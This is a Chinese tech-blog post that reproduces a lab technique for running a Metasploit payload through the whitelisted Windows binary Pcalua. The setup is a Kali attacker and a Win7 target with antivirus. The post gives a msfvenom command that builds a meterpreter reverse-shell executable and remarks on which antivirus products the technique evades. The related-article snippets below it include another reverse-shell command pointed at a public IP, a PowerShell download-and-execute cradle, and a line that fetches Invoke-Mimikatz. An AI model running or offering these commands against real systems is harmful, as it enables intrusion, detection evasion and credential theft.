对亮神基于白名单Pcalua执行payload第十五季复现

最新推荐文章于 2024-05-20 10:52:16 发布
最新推荐文章于 2024-05-20 10:52:16 发布
阅读量320 收藏
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89880220
版权

0x00 Pcalua 简介:

Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。

0x01 环境

攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机
在这里插入图片描述
靶机
在这里插入图片描述
shell弹回
在这里插入图片描述

0x03 shellcode.exe

在这里插入图片描述

msfvenom -a  x86 --platform windows -p  windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f exe > shellcode.exe

0x04 总结

过电脑管家,不过360

0x05借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/85_基于白名单Pcalua执行payload第十五季.html

cxk331
关注
专栏目录
第七十九课:基于白名单Regsvr32执行payload第九1
08-03
### 基于白名单Regsvr32执行payload第九1 #### 一、Regsvr32命令概述 Regsvr32是Windows操作系统中的一个实用工具,主要用于注册或卸载COM(Component Object Model)组件。它通过命令行接口进行操作,支持多种...
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
05-09
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
渗透测试-基于白名单执行payload--Pcalua
weixin_30662109的博客
05-03 550
0x01 Pcalua简介 Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。 说明:Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别 Windows 7 默认位置: C:\Windows\System32\pcalua.exe 0x02 复现 攻...
Windows 系统下实现间接命令执行
cainsoftware的博客
10-09 1028
0x00 前言 最近学习看到了关于Windows系统下实现间接命令执行的文章。某些情况下,可以使用非cmd.exe的一些自带的程序文件来执行命令,常见的场景就是逃避检测,绕过一些HIDS,看到国外的文章讲的是可以绕过应用程序白名单产品。具体可利用于哪些场景还得靠表哥们研究下。这里直接就用找到的一些例子来测试下。 0x01 操作 1.forfiles forfiles是一款windows平台的软件工具,其中选择文件并运行一个命令来操作文件。 实际需要执行的命令是通...
pcalua.exe文件丢失导致程序无法运行问题
最新发布
2301_76755223的博客
05-20 896
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个pcalua.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现pcalua.exe丢失要怎么解决?
Win7系统提示找不到pcalua.exe文件的解决办法
file
03-07 806
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个pcalua.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现pcalua.exe丢失要怎么解决?
Pcalua+Powershell混淆
reaido的博客
01-29 304
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
第八十五课:基于白名单Pcalua执行payload第十五.docx
09-15
在本课程中,我们探讨了如何利用白名单机制下的Pcalua执行payload,这是一个针对Windows系统的高级持续性威胁(APT)攻击技术。Pcalua,全称为Windows进程兼容性助理,是微软操作系统中的一个组件,它帮助用户解决...
第八十课:基于白名单Wmic执行payload第十.docx
09-15
### 基于白名单Wmic执行payload第十 #### Wmic简介 WMIC(Windows Management Instrumentation Command-line)是Windows系统内置的一个强大的命令行工具,用于管理和监控Windows系统的各个方面。它通过提供一种...
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
在本课程中,我们探讨了如何利用Windows内置的命令行工具Forfiles来执行特定的payload,这在网络安全领域,特别是APT(Advanced Persistent Threat)攻击与防御中具有重要意义。Forfiles是一个实用程序,允许用户...
二进制安全之木马程序简介
weixin_51339377的博客
03-17 1077
当作(计算机会把不同的程序作为什么类型的文件和不同的方式来进行执行) 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!! 操作系统为了方便用户使用,使用后缀名这个机制: .exe .dll .jpg .jpeg .png .avi .mp3 .mp4.... 逆向工程工具:C32 协议: 李老师协议: 协议头001100->内容1->结束语1111 001100 xxxxxxxxx xxxx xxxx xxxxx 1111 0101110101
对亮基于白名单Installutil.exe 执行 payload 第二复现
cxk
05-02 658
0x00 Installer简介 Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 she...
对亮基于白名单Regsvr32 执行 payload 第九复现
cxk
05-03 604
0x00 Regsvr32简介: Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
windows命令执行漏洞
11-30 953
1、powershell eg: 1 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz....
对亮基于白名单Wmic 执行 payload 第十复现
cxk
05-03 462
0x01 Wmic简介: WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之...
生成msf常用payload
Fly_鹏程万里
06-04 8025
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
对亮基于白名单Mshta.exe 执行 payload 第五复现
cxk
05-03 2508
0x00 Mshta简介 Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 shell弹回 0x03 test.h...
对亮基于白名单 Msbuild.exe 执行 payload 第一复现
cxk
05-01 740
0x00 MSBuild简介: MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩...
利用Installutil.exe绕过白名单执行payload实战
"本资源主要介绍了如何利用白名单中的Installutil.exe执行payload,涉及Windows系统、.NET框架以及安全攻防的技巧。" 在网络安全领域,APT(Advanced Persistent Threat)攻击是一种持续性、高度隐蔽的威胁,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值